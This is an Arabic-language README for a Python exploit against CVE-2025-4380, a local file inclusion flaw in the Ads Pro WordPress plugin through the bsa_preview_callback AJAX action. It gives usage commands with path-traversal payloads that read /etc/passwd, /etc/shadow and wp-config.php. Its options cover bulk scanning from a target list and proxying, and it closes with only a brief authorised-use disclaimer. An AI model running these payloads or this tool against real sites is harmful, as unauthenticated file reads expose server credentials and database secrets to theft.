
استغلال مكتوب بلغة بايثون لثغرة CVE-2025-4380، وهي ثغرة تضمين الملفات المحلية في إضافة Ads Pro لووردبريس. يدعم فحص الأهداف الفردية والمتعددة مع دعم البروكسي.
يستهدف هذا الاستغلال بلغة بايثون إضافة Ads Pro للإصدار ≤ 4.89 في ووردبريس، والتي تعاني من ثغرة إدراج الملفات المحلية (LFI) عبر إجراء AJAX الخاص بـ bsa_preview_callback.
يمكن للمهاجم غير المصادق استغلال هذه الثغرة لقراءة أي ملفات من نظام الملفات في الخادم، بما في ذلك الملفات الحساسة مثل /etc/passwd وwp-config.php وغيرها.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
طلب/استجابة Burpsuite
bsa_template في bsa_preview_callbackهذا الاستغلال مقدم للأغراض التعليمية واختبارات الأمان المصرح بها فقط.
| الوسيط | الوصف | مطلوب |
|---|
-u, --url | رابط الهدف (مثل http://target.com) | اختياري |
-l, --list | ملف يحتوي على قائمة بروابط الأهداف | اختياري |
-p, --path | مسار الملف المراد تضمينه (مثل ../../etc/passwd) | نعم |
-o, --output | ملف الإخراج لحفظ النتائج | اختياري |
--proxy | الوكيل (مثل http://127.0.0.1:8080) | اختياري |